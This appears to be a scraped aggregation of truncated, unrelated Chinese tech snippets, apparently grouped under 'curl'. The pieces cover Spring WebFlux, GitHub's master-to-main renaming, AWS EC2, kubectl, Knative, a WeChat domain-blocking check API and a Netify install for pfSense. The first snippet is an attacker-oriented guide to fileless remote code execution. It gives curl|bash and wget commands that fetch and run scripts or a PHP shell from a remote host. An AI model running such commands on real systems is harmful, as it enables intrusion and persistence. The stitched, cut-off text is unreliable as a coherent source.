curl

本文转载自微信公众号「Bypass」，作者Bypass。转载本文请联系Bypass公众号。 在 过程中， 者往往需要通过命令下载执行恶意代码，实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。 在目标主机执行恶意代码，可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来，我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。 一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本，无需download，在本地机器上直接执行。 方式1：curl -fsSL http://192.168.99.19:8080/test.sh | bash 方式2：bash < <( curl http://192.168.99.19:8080/test.sh ) 02、wget 执行wget命令远程下载恶意程序。 方式1：wget -q -O- http://192.168.99.19:8080/test.sh | bash 方式2：wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php curl+wget合并，实现无文件远程恶意代码执行。 bash -c '(curl -fsSL http://192

【SpringBoot WebFlux 系列】WebFlux 之 header 参数解析 上一篇 weblfux 主要介绍了 path 参数的解析与映射关系，在我们进入 url 参数/post 表单之前，先看一下另外的一种参数--请求头中的参数如何处理 <!-- more --> I. 项目环境 本项目借助 SpringBoot 2.2.1.RELEASE + maven 3.5.3 + IDEA 进行开发 1. 依赖 使用 WebFlux，最主要的引入依赖如下（省略掉了 SpringBoot 的相关依赖，如对于如何创建 SpringBoot 项目不太清楚的小伙伴，可以关注一下我之前的博文） <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-webflux</artifactId> </dependency> </dependencies> II. 请求头参数解析 在实际的业务开发中，有几个请求头出现的频率特别高，如常用于反爬的 User-Agent ，鉴定强求来源的 referer ，跨域相关的 Access-Control-Allow- ，cookie、session 自定义的请求头等 1. 请求头限制 在

转自：开源中国 GitHub 官方表示，从 2020 年 10 月 1 日起，在该平台上创建的所有新的源代码仓库将默认被命名为 "main"，而不是原先的"master"。 值得注意的是，现有的存储库不会受到此更改影响。 早在今年 6 月份，受美国大规模的 “Black Lives Matter”运动影响，为了安抚愈演愈烈的民众情绪，GitHub 就宣布将替换掉 master 等术语，以避免联想奴隶制。现如今，在外界一些声音的催促下，这一举措则终于要正式落地了。 除 GitHub 外，为了避免带有所谓的“种族歧视色彩”，许多科技巨头或知名软件也都调整了自己的业务和产品，以平息社会舆论。包括有：MySQL 宣布删除 master、黑名单白名单等术语；Linus Torvalds 通过了 Linux 中避免 master/slave 等术语的提案；还有 Twitter 、GitHub、微软、LinkedIn、Ansible、Splunk、OpenZFS、OpenSSL、JP Morgan、 Android 移动操作系统、Go 编程语言、PHPUnit 和 Curl 等宣布要对此类术语进行删除或更改。同时，IBM、亚马逊、微软也都接连调整面部识别平台业务，以防加深歧视或遭受指责。 且最初在 Git 中写下“master”一词的开发者 Petr Baudis 也于 6

什么是 AWS EC2 Amazon Elastic Compute Cloud (Amazon EC2) 直译过来是一种可伸缩的计算云，提供了广泛的实例类型选择，这些实例类型经过优化以适应不同的用例，实例类型包括CPU、内存、存储和网络容量的不同组合，使我们能够灵活地为应用程序选择适当的资源组合。每个实例类型包括一个或多个实例大小，允许您将资源扩展到目标工作负载的需求。这里是 EC2 实例类型一览表 ，截部分图在这里展示 说简单一点: EC2 就是一个按照你需求配置的虚拟机，如果你需要在虚拟机上做 CPU 密集型的任务，那就选高 CPU 低内存的实例，如果是 I/O 密集型的，那就选择低 CPU 高内存的实例，花最少的钱满足提供最贴合你需要的服务 在 EC2 上安装 Apache 服务 有了这个基本的了解过后，我们就可以在 EC2 上安装 Apache 服务来进一步了解 EC2 前置准备 由于自己开通了 AWS free tier（绑定信用卡），可以免费玩 12 个月，如果你也这样做，建议 设置好账单阈值 ，当使用了产生费用的服务时，会给你提醒，以防产生过多开销 新建 EC2 点击下图 Launch Instance 按钮新建 EC2 实例 新建 EC2 实例主要按照下图上方的七步完成，首先是选择 AMI (Amazon Machine Images), 其实就像选择操作系统

deployment 5个常用参数 起一个deployment kubectl create -f helloworld.yml kubectl get deployment kubectl get rs label应该是helloworld kubectl get pods --show-labels kubectl rollout status deployment/helloworld-deployment kubectl expose deployment helloworld-deployment --type=NodePort kubectl get svc kubectl describe service helloworld-deployment 得到3个node IP和端口，curl一下 curl cluster ip curl 10.10.187.253:3000 更换一个新版本的image，在curl下，发现内容变成v2了 kubectl set image deployment/helloworld-deployment k8s-demo=wardviaene/k8s-demo:2 kubectl rollout status deployment/helloworld-deployment curl 10.10.187.253:3000

系列文章: 总目录索引： 九析带你轻松完爆 Knative 系列教程 目录 1 前言 2 邀约 3 Knative 简介 4 Knative Serving 架构 4.1 Configuration 对象 4.2 Route 对象 4.3 Service 对象 4.4 Revision 对象 4.5 Knative serving 各组件之间关系 1 前言 如果你对博客有任何疑问，请告诉我。 2 邀约 你可以从 b 站搜索 “九析”，获取免费的、更生动的视频资料： 3 Knative 简介 上小节中介绍 Knative 0.17.0 版本中主要组件有 Serving 和 Event。这节简要介绍一下 Serving 组件。 Serving 组件是让应用运行起来并提供服务，其中包括： 自动启动和销毁容器 自动生成网络访问的 service、ingress 对象（这些原来需要运维编写相关 Yaml 文件） 监控应用的请求，根据请求自动进行扩缩容（这些原来需要运维指定 K8S HPA） 使用 k8s 管理应用是一件比较辛苦的事情，尽管 k8s 针对容器编排已经非常方便，但是仍然会有很多手工、重复性工作。比如，需要根据源码创建镜像（无论是手动编写 Dockerfile 还是通过工具创建流水线）、创建 deployment 对象、创建 service 对象、创建 ingress 对象

在微信上做推广的朋友应该经常会遇到这个情况，运行的好好的网站，因为不小心上传了不符合微信规定的网页，或者被同行恶意举报，而出现被屏蔽，内容无法查看的字样，放弃？？不甘心！！于是进入了域名防封的流程，百度上有许多微信域名防封检测的网页，甚至还有一些打着包票说百分之百的防封，在这里，我要提醒大家，没有谁能那样保证，没有百分百一说，不要被网上那些人给骗了。 现如今微信对第三方推广链接的检测是越来越严格了，分享链接在微信中转发经常会被拦截，无法打开网页，一旦被拦截用户在微信中识别二维码、点击链接就会提示“已停止访问该网页”，如此一来对外分享的二维码链接之类的基本就作废了，用户想要访问只能通过手动复制链接再打开浏览器粘贴访问，这样就会造成用户体验效果差，用户量无法有效地累积起来，从而导致推广成本一直在增加，推广效率却无法有明显的提升等问题。所以针对这个问题，特写这篇文章分享给有需要的朋友。其实当我们遇到这些问题的时候，只需要一个微信域名拦截检测API接口就行了，微信域名检测主要是通过技术手段达到预防效果，实时检测域名是否被和谐，从而得到更及时的处理。 大家看个示例 PHP $url = " http://api.monkeyapi.com "; $params = array( 'appkey' =>'appkey',//您申请的APPKEY 'url' =>'www.monkeyapi

Netify 可以对内部网络中的流量提供完整的可见性和完整分析。Netify从深度数据包检查(DPI)网络数据包分析器开始，被动地收集本地网络上的数据。然后将元数据安全地发送到云进行收集、分析和报告。 NETIFY的底层的网络化深度数据包检查代理是免费且开源，并根据GPLv3进行了许可。 NETIFY FWA是基于本地的应用不收费 。Netify基于云的服务是一项付费订阅服务。 pfSense安装NETIFY Netify软件包占用资源不多，不涉及pfSense正常部署。 底层的Netify深度数据包检查引擎所需的CPU使用与***检测/预防系统所需的占用差不多，网络越繁忙，所需的CPU占用就越多。 最新的Netify软件包已保存在 pfSense存储库中 。要安装软件包，请使用管理员帐号在shell环境下运行以下命令： curl http://download.netify.ai/netify/pfsense/2.4.x/stable/netify-install.sh | sh 目前只支持pfSense2.4x的安装，暂不支持pfSense2.5.x。 安装完成后，导航至 状态> 服务， 查看netifyd服务是否正在运行。再导航到 服务> Netify ，单击“ Provision ”选项卡，然后单击“ enabled ”按钮来初始化Netify系统。稍等就会看到“